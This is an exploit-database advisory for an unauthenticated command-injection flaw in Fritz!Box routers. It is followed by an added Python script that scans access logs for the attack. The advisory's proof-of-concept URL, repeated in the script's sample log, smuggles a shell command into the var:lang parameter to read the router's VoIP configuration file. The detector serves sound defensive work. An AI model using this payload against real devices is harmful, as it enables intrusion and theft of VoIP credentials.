Fritz!Box - Remote Command Execution
Author: 0x4148
type: webapps
platform: hardware
port:
date_added: 2014-05-01
date_updated: 2014-05-01
verified: 0
codes: OSVDB-103289;CVE-2014-9727
tags:
aliases:
screenshot_url:
application_url:
App : Fritz!Box
Author : 0x4148
Fritz!Box is a networking/Voice over IP router produced by AVM. It suffers from an unauthenticated remote command execution flaw.
PoC:
https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
#0x4148_rise
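
Added example (not part of the original advisory and not the author's code): a log check that flags requests to `/cgi-bin/webcm` whose `var:lang` parameter decodes to anything other than a short language code, as in the PoC above. The access-log format, the sample lines and the assumption that legitimate values look like `de` or `en` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate var:lang value is a short language code ("de", "en").
LANG_OK = re.compile(r"[A-Za-z]{2,3}(?:[-_][A-Za-z]{2})?")
# Request line as written by common/combined access-log formats (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines using documentation addresses, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/May/2014:10:00:00 +0000] '
    '"GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=de HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/May/2014:10:00:05 +0000] '
    '"GET /cgi-bin/webcm?getpage=../html/menus/menu2.html'
    '&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26 HTTP/1.1" 200 9001',
    '192.0.2.10 - - [01/May/2014:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 300',
]


def suspicious_webcm(target):
    """Return the decoded var:lang value when a webcm request carries a value
    that is not a plain language code; return None otherwise."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/webcm"):
        return None
    # parse_qsl splits on the raw '&' first and percent-decodes afterwards, so an
    # encoded %26 stays inside the value. A raw '&' leaves var:lang blank or
    # truncated, which keep_blank_values lets us see and flag as well.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "var:lang" and not LANG_OK.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client, decoded var:lang) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        value = suspicious_webcm(match.group(1))
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} webcm var:lang={value!r}")
```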